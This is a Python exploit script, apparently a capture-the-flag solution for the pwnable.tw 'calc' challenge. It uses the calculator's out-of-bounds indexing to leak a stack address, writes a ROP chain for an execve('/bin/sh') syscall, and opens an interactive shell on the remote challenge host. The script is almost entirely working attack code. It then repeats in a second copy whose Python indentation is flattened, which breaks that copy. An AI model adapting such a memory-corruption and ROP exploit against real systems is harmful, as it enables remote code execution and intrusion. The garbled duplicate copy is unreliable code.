bin2415/attack_calc.py

## attack_calc.py
from pwn import *
from struct import pack

#/bin/sh/ = 0x6e69622f,0x0068732f

addr1 = 0x8070880 # int 80; ret
addr2 = 0x807cb7f # inc eax; ret
addr3 = 0x80908d0 # mov eax, 7;ret
addr4 = 0x80701aa # pop edx; ret
addr5 = 0x80701d1 # pop ecx; pop ebx; ret
bin_sh1 = 0x6e69622f
bin_sh2 = 0x0068732f

str1 = '+360\n' # get the main ebp address

p = remote('chall.pwnable.tw','10100')
# p = process('./calc')
# gdb.attach(p , '''
#     break calc
#     break *0x80494a6
# ''')
p.recvline()
p.send(str1)

addr_main_ebp = int(p.recvline())
print("main ebp address is ", hex(addr_main_ebp))
addr_bin_sh = addr_main_ebp + (11-(24/4+1)) * 4

###########ROP chain ##############
'''
addr3
addr2
addr2
addr2
addr2
addr4
0
addr5
0
addr_bin_sh
addr1
bin_sh1
bin_sh2'''
###########ROP chain ###############

payload_arr = [addr3, addr2, addr2, addr2, addr2, addr4, 0, addr5, 0, addr_bin_sh, addr1, bin_sh1, bin_sh2]
for i in range(len(payload_arr)):
    if(i >= 9):
        prex = '+37'
        append = i - 9
    else:
        prex = '+36'
        append = i + 1

    send_str1 = prex +str(append)
    p.sendline(send_str1)
    recv1 = p.recvline()
    print(recv1)
    recv_val = int(recv1)
    print("the 36"+str(i+1)+" content is " + str(hex(recv_val)))
    offset = payload_arr[i] - recv_val
    if offset > 0:
        p.sendline(prex +str(append) + '+' + str(offset))
    else:
        offset = -1 * offset
        p.sendline(prex +str(append) + '-' + str(offset))

    recv_val2 = int(p.recvline())
    print("the modified 36" + str(i+1) + " content is " + str(hex(recv_val2)))

p.sendline()
p.interactive()
	from pwn import *
	from struct import pack

	#/bin/sh/ = 0x6e69622f,0x0068732f

	addr1 = 0x8070880 # int 80; ret
	addr2 = 0x807cb7f # inc eax; ret
	addr3 = 0x80908d0 # mov eax, 7;ret
	addr4 = 0x80701aa # pop edx; ret
	addr5 = 0x80701d1 # pop ecx; pop ebx; ret
	bin_sh1 = 0x6e69622f
	bin_sh2 = 0x0068732f

	str1 = '+360\n' # get the main ebp address

	p = remote('chall.pwnable.tw','10100')
	# p = process('./calc')
	# gdb.attach(p , '''
	# break calc
	# break *0x80494a6
	# ''')
	p.recvline()
	p.send(str1)

	addr_main_ebp = int(p.recvline())
	print("main ebp address is ", hex(addr_main_ebp))
	addr_bin_sh = addr_main_ebp + (11-(24/4+1)) * 4

	###########ROP chain ##############
	'''
	addr3
	addr2
	addr2
	addr2
	addr2
	addr4
	0
	addr5
	0
	addr_bin_sh
	addr1
	bin_sh1
	bin_sh2'''
	###########ROP chain ###############

	payload_arr = [addr3, addr2, addr2, addr2, addr2, addr4, 0, addr5, 0, addr_bin_sh, addr1, bin_sh1, bin_sh2]
	for i in range(len(payload_arr)):
	if(i >= 9):
	prex = '+37'
	append = i - 9
	else:
	prex = '+36'
	append = i + 1

	send_str1 = prex +str(append)
	p.sendline(send_str1)
	recv1 = p.recvline()
	print(recv1)
	recv_val = int(recv1)
	print("the 36"+str(i+1)+" content is " + str(hex(recv_val)))
	offset = payload_arr[i] - recv_val
	if offset > 0:
	p.sendline(prex +str(append) + '+' + str(offset))
	else:
	offset = -1 * offset
	p.sendline(prex +str(append) + '-' + str(offset))

	recv_val2 = int(p.recvline())
	print("the modified 36" + str(i+1) + " content is " + str(hex(recv_val2)))

	p.sendline()
	p.interactive()